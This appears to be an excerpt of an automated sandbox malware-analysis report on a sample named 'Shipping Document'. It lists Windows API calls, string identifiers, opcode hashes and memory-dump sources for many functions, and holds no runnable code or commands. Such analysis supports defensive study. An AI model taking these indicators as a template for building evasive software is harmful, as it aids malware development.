                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                              • String ID: 0$F
                              • API String ID: 176399719-3044882817
                              • Opcode ID: 40b3932b48d91e6b9ca2044cb8709a3f9dbdf0bb003c9c90486c886878e53631
                              • Instruction ID: 0c9d3352f5fea480b7dd8b4b5ebbe318ee9fc32139ddb8aa15b900043f9cefd7
                              • Opcode Fuzzy Hash: 40b3932b48d91e6b9ca2044cb8709a3f9dbdf0bb003c9c90486c886878e53631
                              • Instruction Fuzzy Hash: 27414CB9A00205EFDB20DF68D984EAABBF5FF49310F144069FA95A7351DB35A910CF90
                              APIs
                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 010477CD
                              • CreateCompatibleDC.GDI32(00000000), ref: 010477D4
                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010477E7
                              • SelectObject.GDI32(00000000,00000000), ref: 010477EF
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 010477FA
                              • DeleteDC.GDI32(00000000), ref: 01047803
                              • GetWindowLongW.USER32(?,000000EC), ref: 0104780D
                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01047821
                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0104782D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                              • String ID: static
                              • API String ID: 2559357485-2160076837
                              • Opcode ID: 069596b31f1038f881b748c40d2d0acecb8652dc0499e252f84d3c4334264054
                              • Instruction ID: b241ca93bd7b179c67c567f2a504be2a2a55b9224ae0354e91646062e5d848c0
                              • Opcode Fuzzy Hash: 069596b31f1038f881b748c40d2d0acecb8652dc0499e252f84d3c4334264054
                              • Instruction Fuzzy Hash: 2A3180B5101116BBEF229F78DC88FDA3BA9FF0D320F110224FA95A6090C736D811DBA4
                              APIs
                              • _memset.LIBCMT ref: 00FE707B
                                • Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68
                              • __gmtime64_s.LIBCMT ref: 00FE7114
                              • __gmtime64_s.LIBCMT ref: 00FE714A
                              • __gmtime64_s.LIBCMT ref: 00FE7167
                              • __allrem.LIBCMT ref: 00FE71BD
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE71D9
                              • __allrem.LIBCMT ref: 00FE71F0
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE720E
                              • __allrem.LIBCMT ref: 00FE7225
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE7243
                              • __invoke_watson.LIBCMT ref: 00FE72B4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                              • String ID:
                              • API String ID: 384356119-0
                              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                              • Instruction ID: c09d1dfd7bc8e9f8ed3262cbe60fd7c7b6ef81639e0397a47531a7f481ac2b2f
                              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                              • Instruction Fuzzy Hash: 7471E872E04757ABD714BE7ACC41B6BB3A8AF10730F14422AF614E7691E774E940AB90
                              APIs
                              • _memset.LIBCMT ref: 01022A31
                              • GetMenuItemInfoW.USER32(01086890,000000FF,00000000,00000030), ref: 01022A92
                              • SetMenuItemInfoW.USER32(01086890,00000004,00000000,00000030), ref: 01022AC8
                              • Sleep.KERNEL32(000001F4), ref: 01022ADA
                              • GetMenuItemCount.USER32(?), ref: 01022B1E
                              • GetMenuItemID.USER32(?,00000000), ref: 01022B3A
                              • GetMenuItemID.USER32(?,-00000001), ref: 01022B64
                              • GetMenuItemID.USER32(?,?), ref: 01022BA9
                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01022BEF
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01022C03
                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01022C24
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                              • String ID:
                              • API String ID: 4176008265-0
                              • Opcode ID: 102532fc3a3855cc6400153a21ae5ea4b4d62a69f6d3dd52420dbc06633557a7
                              • Instruction ID: 106370fc8b0acfc3f248f13167a0f5ffb990436b86674c5f8b5b44a2159d1d99
                              • Opcode Fuzzy Hash: 102532fc3a3855cc6400153a21ae5ea4b4d62a69f6d3dd52420dbc06633557a7
                              • Instruction Fuzzy Hash: B261B4B090025AAFEB22CFE8D988DFE7BB8EB45304F144599E9C197241D736AD45CB21
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01047214
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01047217
                              • GetWindowLongW.USER32(?,000000F0), ref: 0104723B
                              • _memset.LIBCMT ref: 0104724C
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0104725E
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010472D6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow_memset
                              • String ID:
                              • API String ID: 830647256-0
                              • Opcode ID: 3334a13b778f04d77cd596333cdf0b10cf53f435c2b460302c7fee8ed9fbf8d9
                              • Instruction ID: f38fef6449d4c2228115f49c98d6f5cedb7ba48373df96deb8c427d71bb787e8
                              • Opcode Fuzzy Hash: 3334a13b778f04d77cd596333cdf0b10cf53f435c2b460302c7fee8ed9fbf8d9
                              • Instruction Fuzzy Hash: 37618FB5900208EFDB20DFA8CC81EEE77F8EB09710F1441A9FA94A7391D775A941CB50
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01017135
                              • SafeArrayAllocData.OLEAUT32(?), ref: 0101718E
                              • VariantInit.OLEAUT32(?), ref: 010171A0
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 010171C0
                              • VariantCopy.OLEAUT32(?,?), ref: 01017213
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 01017227
                              • VariantClear.OLEAUT32(?), ref: 0101723C
                              • SafeArrayDestroyData.OLEAUT32(?), ref: 01017249
                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01017252
                              • VariantClear.OLEAUT32(?), ref: 01017264
                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0101726F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 81220e4279c08530c16eef0f949fcd65820147cb5ea9fa08ad1e9386b5cf7153
                              • Instruction ID: 8a81458fa2502ba68ce235f6d63333451f37953bfa9412559f631166371edaad
                              • Opcode Fuzzy Hash: 81220e4279c08530c16eef0f949fcd65820147cb5ea9fa08ad1e9386b5cf7153
                              • Instruction Fuzzy Hash: 8841727590011AAFCB14DF68D988DEDBBB9FF48350F008069F985A7215CF39A945CB90
                              APIs
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • CoInitialize.OLE32 ref: 01038718
                              • CoUninitialize.OLE32 ref: 01038723
                              • CoCreateInstance.OLE32(?,00000000,00000017,01052BEC,?), ref: 01038783
                              • IIDFromString.OLE32(?,?), ref: 010387F6
                              • VariantInit.OLEAUT32(?), ref: 01038890
                              • VariantClear.OLEAUT32(?), ref: 010388F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 834269672-1287834457
                              • Opcode ID: 8bb3da1b91a7c8d5ddd3819d4865cef1b1ef83feedd88fe913eb6fb76c9d969c
                              • Instruction ID: 7349168f18160fc44b3318a1e62c8392e86aa3f54abb29f9c2ccacbe1725bc51
                              • Opcode Fuzzy Hash: 8bb3da1b91a7c8d5ddd3819d4865cef1b1ef83feedd88fe913eb6fb76c9d969c
                              • Instruction Fuzzy Hash: 2B61B2706083029FD711DF28D948F5EBBE8AF85714F04898EF5C59B291C774E948CB92
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 01035AA6
                              • inet_addr.WSOCK32(?), ref: 01035AEB
                              • gethostbyname.WSOCK32(?), ref: 01035AF7
                              • IcmpCreateFile.IPHLPAPI ref: 01035B05
                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01035B75
                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01035B8B
                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01035C00
                              • WSACleanup.WSOCK32 ref: 01035C06
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                              • String ID: Ping
                              • API String ID: 1028309954-2246546115
                              • Opcode ID: f92594c1f6c5d6968023c35c19b768376458e2721af79b5ddec398f044af8d3b
                              • Instruction ID: e3e28da2d7faa743799441e6bca21da34d90434347bc1fb5dd698271397f92bc
                              • Opcode Fuzzy Hash: f92594c1f6c5d6968023c35c19b768376458e2721af79b5ddec398f044af8d3b
                              • Instruction Fuzzy Hash: 485190316047019FD721DF28CD89B2ABBE8EF84710F048969F995DB2A1DB78E840DF41
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0102B73B
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0102B7B1
                              • GetLastError.KERNEL32 ref: 0102B7BB
                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0102B828
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: 0978b10324001ac8cc6f239da6694f0066586af3f962bec3a6139ab94f2bd425
                              • Instruction ID: 332d0a101d187ce2b520392d5a5bf2dadb76705e137573120323d7f2e6bb2cb5
                              • Opcode Fuzzy Hash: 0978b10324001ac8cc6f239da6694f0066586af3f962bec3a6139ab94f2bd425
                              • Instruction Fuzzy Hash: 4C31B235A0021A9FDB50EF68CD85EBE7BF4FF44700F18806AE585DB292DB759942CB50
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7
                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 010194F6
                              • GetDlgCtrlID.USER32 ref: 01019501
                              • GetParent.USER32 ref: 0101951D
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 01019520
                              • GetDlgCtrlID.USER32(?), ref: 01019529
                              • GetParent.USER32(?), ref: 01019545
                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 01019548
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 1536045017-1403004172
                              • Opcode ID: 13bce72289aff73b1a1a80b4766d25f69c170d23009553345ff0fe4eb033e625
                              • Instruction ID: 1bef25fea2f5601c23881a8e24fa5c1a26eb7a866ae5e05dcf8c3070838a815d
                              • Opcode Fuzzy Hash: 13bce72289aff73b1a1a80b4766d25f69c170d23009553345ff0fe4eb033e625
                              • Instruction Fuzzy Hash: 9621F174A00205BBDF00AB69CCD5EFEBBB4EF49350F000159B9A297295DB7E9518DB20
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7
                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010195DF
                              • GetDlgCtrlID.USER32 ref: 010195EA
                              • GetParent.USER32 ref: 01019606
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 01019609
                              • GetDlgCtrlID.USER32(?), ref: 01019612
                              • GetParent.USER32(?), ref: 0101962E
                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 01019631
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 1536045017-1403004172
                              • Opcode ID: 5256bbd2635d0d6bd5dd35a6e2db32ea8048616e78ec4c1437cdc78439b70366
                              • Instruction ID: 19976381138c170e88db36afc4bf066f4ccfa3a9ce5ebaa961e5ae42b8d6c76b
                              • Opcode Fuzzy Hash: 5256bbd2635d0d6bd5dd35a6e2db32ea8048616e78ec4c1437cdc78439b70366
                              • Instruction Fuzzy Hash: 8D21D374900205BBDF00ABB5CCD5EFEBBB8EF58300F000159B99197199DB7E9519DB20
                              APIs
                              • GetParent.USER32 ref: 01019651
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 01019666
                              • _wcscmp.LIBCMT ref: 01019678
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 010196F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClassMessageNameParentSend_wcscmp
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 1704125052-3381328864
                              • Opcode ID: bb128bd0978fb9c7f560f6d4e266953c457e5c7cc2a21af5da2c3281ff5f853d
                              • Instruction ID: 89354ce76c998eaaaef2dedb314c77034008b3dc729f289e602e52c9555205f9
                              • Opcode Fuzzy Hash: bb128bd0978fb9c7f560f6d4e266953c457e5c7cc2a21af5da2c3281ff5f853d
                              • Instruction Fuzzy Hash: 74115C7A648313BAF611252ADC2FDA677DC9B09378F10001AF940E5096FE6E6500C768
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 01038BEC
                              • CoInitialize.OLE32(00000000), ref: 01038C19
                              • CoUninitialize.OLE32 ref: 01038C23
                              • GetRunningObjectTable.OLE32(00000000,?), ref: 01038D23
                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 01038E50
                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01052C0C), ref: 01038E84
                              • CoGetObject.OLE32(?,00000000,01052C0C,?), ref: 01038EA7
                              • SetErrorMode.KERNEL32(00000000), ref: 01038EBA
                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01038F3A
                              • VariantClear.OLEAUT32(?), ref: 01038F4A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                              • String ID:
                              • API String ID: 2395222682-0
                              • Opcode ID: 340284ef5ca951b3c6131b7dd5b1f6664c2f4b8040994c57d03563af2b51e843
                              • Instruction ID: d52d11481a64b3f29c42682d7a51293d5b78fed81184917cb0088db4f7145dda
                              • Opcode Fuzzy Hash: 340284ef5ca951b3c6131b7dd5b1f6664c2f4b8040994c57d03563af2b51e843
                              • Instruction Fuzzy Hash: 37C127B1208306AFD700DF68C98496BBBE9FF89748F004A9DF5899B251DB71ED05CB52
                              APIs
                              • __swprintf.LIBCMT ref: 0102419D
                              • __swprintf.LIBCMT ref: 010241AA
                                • Part of subcall function 00FE38D8: __woutput_l.LIBCMT ref: 00FE3931
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 010241D4
                              • LoadResource.KERNEL32(?,00000000), ref: 010241E0
                              • LockResource.KERNEL32(00000000), ref: 010241ED
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0102420D
                              • LoadResource.KERNEL32(?,00000000), ref: 0102421F
                              • SizeofResource.KERNEL32(?,00000000), ref: 0102422E
                              • LockResource.KERNEL32(?), ref: 0102423A
                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0102429B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                              • String ID:
                              • API String ID: 1433390588-0
                              • Opcode ID: 81da1dfe2c8887e2a16802a900f455d20cd2eab0ba0b8642d5fdc2f396ea7abf
                              • Instruction ID: fc1d51308d888d1a64518ad4705c25236c862e2939d8c013b7d9d45d59aeeb1d
                              • Opcode Fuzzy Hash: 81da1dfe2c8887e2a16802a900f455d20cd2eab0ba0b8642d5fdc2f396ea7abf
                              • Instruction Fuzzy Hash: 7C31C1B5A0122AAFDB219FA5DE88EBF7BACEF05301F044555F981D2140D779DA11CBB0
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 01021700
                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01020778,?,00000001), ref: 01021714
                              • GetWindowThreadProcessId.USER32(00000000), ref: 0102171B
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01020778,?,00000001), ref: 0102172A
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0102173C
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01020778,?,00000001), ref: 01021755
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01020778,?,00000001), ref: 01021767
                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01020778,?,00000001), ref: 010217AC
                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01020778,?,00000001), ref: 010217C1
                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01020778,?,00000001), ref: 010217CC
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 5ee7027b5ce8c50979c3025bdc274488fc8118ae256f74d074bc6cb70d871a35
                              • Instruction ID: 55e9cf9bfd32eb2735a84342cdec4386219881c7a649c4706141f555e3d8243b
                              • Opcode Fuzzy Hash: 5ee7027b5ce8c50979c3025bdc274488fc8118ae256f74d074bc6cb70d871a35
                              • Instruction Fuzzy Hash: A331B475600614BBEB319F29D984B6E7BF9BB89711F204055F9C0C628AD7799940CB90
